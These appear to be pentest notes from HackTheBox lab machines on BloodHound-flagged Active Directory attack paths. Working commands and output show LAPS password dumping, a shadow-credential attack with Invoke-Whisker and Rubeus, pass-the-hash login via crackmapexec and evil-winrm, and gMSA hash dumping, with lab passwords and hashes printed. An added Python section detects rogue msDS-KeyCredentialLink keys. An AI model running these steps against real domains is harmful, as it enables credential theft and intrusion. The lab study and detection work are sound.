BloodHound Vector Attacks

ReadLAPSPassword

We can use the utility laps.py to read LAPS passwords from outside the machine; all we need is a valid set of domain credentials:

```shell
python3 laps.py -u JDgodd -p 'JDg0dd1s@d0p3cr3@t0r' -d streamio.htb
LAPS Dumper - Running at 07-07-2022 13:57:05
DC &V@%DQ-wEwQ97A
```

Examples: Timelapse [[StreamIO#^2cc182]]

Another technique is Get-LAPSPasswords.ps1, which can be abused from within the machine:

Examples: Timelapse

AddKeyCredentialLink

We can use Invoke-Whisker.ps1 to abuse this privilege (write access to the target's msDS-KeyCredentialLink attribute). First, after uploading the script to the victim machine, we execute the following command. It adds a key credential to the target and prints a long command to be used with Rubeus.exe:

```powershell
PS C:\Windows\Temp\Recon> Invoke-Whisker -Command "add /target:sflowers"
[*] No path was provided. The certificate will be printed as a Base64 blob
[*] No pass was provided. The certificate will be stored with the password lAfNxND7rgF9A5mJ
[*] Searching for the target account
[*] Target user found: CN=Susan Flowers,CN=Users,DC=outdated,DC=htb
[*] Generating certificate
[*] Certificate generaged
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID 86d8f569-2258-4ab5-8ce1-0c8befa21b55
[*] Updating the msDS-KeyCredentialLink attribute of the target object
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] You can now run Rubeus with the following syntax:
Rubeus.exe asktgt /user:sflowers 
/certificate:MIIJuAIBAzCCCXQGCSqGSIb3DQEHAaCCCWUEgglhMIIJXTCCBhY...
vXgICB9A= /password:"lAfNxND7rgF9A5mJ" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show
```

Rubeus expects the certificate blob on a single line, but the printed command is wrapped, so after saving the output to a file called data we first strip the carriage returns and newlines with "tr" and write the result back in place with "sponge" (from moreutils):

```shell
# '\r\n' removes both CR and LF; deleting only '\n' would leave stray carriage returns from Windows output
tr -d '\r\n' < data | sponge data
```

Finally we need to transfer Rubeus.exe to the machine with curl and execute it exactly as Invoke-Whisker indicated:

```powershell
 ______        _
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=sflowers 
[*] Building AS-REQ (w/ PKINIT preauth) for: 'outdated.htb\sflowers'
[*] Using domain controller: 172.16.20.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
...
  ServiceName              :  krbtgt/outdated.htb
  ServiceRealm             :  OUTDATED.HTB
  UserName                 :  sflowers
  UserRealm                :  OUTDATED.HTB
  StartTime                :  1/25/2023 7:28:01 AM
  EndTime                  :  1/25/2023 5:28:01 PM
  RenewTill                :  2/1/2023 7:28:01 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  8hh6He6G6F2lLiBgwgmo3w==
  ASREP (key)              :  EB63CD6F931B4E922AC0EC5439D0C716

[*] Getting credentials using U2U

  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
       NTLM              : 1FCDB1F6015DCB318CC77BB2BDA14DB5
```

This returns the NTLM hash of the user sflowers, which we can then check with crackmapexec:

```shell
crackmapexec winrm 10.10.11.175 -u 'sflowers' -H '1FCDB1F6015DCB318CC77BB2BDA14DB5' 
SMB         10.10.11.175    5985   DC               [*] Windows 10.0 Build 17763 (name:DC) (domain:outdated.htb)
HTTP        10.10.11.175    5985   DC               [*] http://10.10.11.175:5985/wsman
WINRM       10.10.11.175    5985   DC               [+] outdated.htb\sflowers:1FCDB1F6015DCB318CC77BB2BDA14DB5 (Pwn3d!)
```

The [+] and the (Pwn3d!) indicate that it is possible to log in via WinRM, so let's do it:

```shell
evil-winrm -i 10.10.11.175 -u 'sflowers' -H '1FCDB1F6015DCB318CC77BB2BDA14DB5'

*Evil-WinRM* PS C:\Users\sflowers\Documents>
```

Examples: Outdated
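Added example, not part of the original notes: seen from the defender's side, the whole chain above rests on the single write Whisker makes to the target's msDS-KeyCredentialLink attribute, so reviewing that attribute across accounts is how such a key is found. The Python below is my own code (not Whisker's, Rubeus' or BloodHound's): it decodes a value's KEYCREDENTIALLINK_BLOB following the MS-ADTS layout and flags a DeviceId that no enrolled device accounts for. The attribute value is constructed here from the DeviceID and DN that Whisker printed above; it is not a captured value.

```python
import struct
import uuid
from datetime import datetime, timedelta, timezone

# KEYCREDENTIALLINK_ENTRY identifiers (MS-ADTS 2.2.20.6) used below; other entries are skipped.
KEY_USAGE, KEY_SOURCE, DEVICE_ID, KEY_CREATION_TIME = 0x04, 0x05, 0x06, 0x09
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)  # FILETIME = 100 ns ticks since here

def parse_key_credential_link(value: str) -> dict:
    """Decode one value in LDAP string form 'B:<hexlen>:<hex>:<owner DN>' into review fields."""
    prefix, hexlen, hexdata, dn = value.split(":", 3)
    if prefix != "B" or int(hexlen) != len(hexdata):
        raise ValueError("not a well-formed DN-with-binary value")
    blob = bytes.fromhex(hexdata)
    fields = {"dn": dn, "version": struct.unpack_from("<I", blob, 0)[0]}
    offset = 4
    while offset + 3 <= len(blob):
        # Each entry: 2-byte little-endian length, 1-byte identifier, then the value bytes.
        length, ident = struct.unpack_from("<HB", blob, offset)
        data = blob[offset + 3 : offset + 3 + length]
        offset += 3 + length
        if ident == DEVICE_ID and length == 16:
            fields["device_id"] = str(uuid.UUID(bytes_le=data))
        elif ident == KEY_CREATION_TIME and length == 8:
            ticks = struct.unpack("<Q", data)[0]
            fields["created"] = FILETIME_EPOCH + timedelta(microseconds=ticks // 10)
    return fields

def review(value: str, enrolled_device_ids: set) -> list:
    """Flag a key whose DeviceId no enrolled device accounts for (the sign of an out-of-band write)."""
    f = parse_key_credential_link(value)
    if f.get("device_id") in enrolled_device_ids:
        return []
    return [f"{f['dn']}: DeviceId {f.get('device_id')} created {f.get('created')} not in device inventory"]

def _entry(ident: int, data: bytes) -> bytes:
    return struct.pack("<HB", len(data), ident) + data

def constructed_sample(device_id: str, created: datetime, dn: str) -> str:
    """Constructed sample value in the real blob layout (not a captured attribute)."""
    ticks = ((created - FILETIME_EPOCH) // timedelta(microseconds=1)) * 10
    blob = struct.pack("<I", 0x200) + _entry(KEY_USAGE, b"\x01") + _entry(KEY_SOURCE, b"\x00")
    blob += _entry(DEVICE_ID, uuid.UUID(device_id).bytes_le) + _entry(KEY_CREATION_TIME, struct.pack("<Q", ticks))
    return f"B:{len(blob.hex())}:{blob.hex().upper()}:{dn}"

# The DeviceID and target DN from the Whisker output above, wrapped in a constructed value.
SAMPLE_VALUE = constructed_sample("86d8f569-2258-4ab5-8ce1-0c8befa21b55",
    datetime(2023, 1, 25, 7, 28, 1, tzinfo=timezone.utc), "CN=Susan Flowers,CN=Users,DC=outdated,DC=htb")
```

In a real review the values come from an LDAP query for msDS-KeyCredentialLink and the inventory from the device management system; a key on an account that never enrolled a Windows Hello or FIDO device is the case to investigate.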

ReadGMSAPassword

After looking into how to exploit ReadGMSAPassword from our user, an excellent technique to obtain the gMSA password is abusing gMSADumper.py as follows:

```shell
/usr/share/privesc/Windows/gMSADumper.py -u 'Ted.Graves' -p 'Mr.Teddy' -d intelligence.htb
Users or groups who can read password for svc_int$:
 > DC$
 > itsupport
svc_int$:::fca9edf1c9fb8f031dfc38d918279642
svc_int$:aes256-cts-hmac-sha1-96:15516a903b67ce2aacda697b76fae9c2d1fc60e3408abc6587b2faeefb6bfac2
svc_int$:aes128-cts-hmac-sha1-96:4e25dcda503a43e8757abe3081892114
```
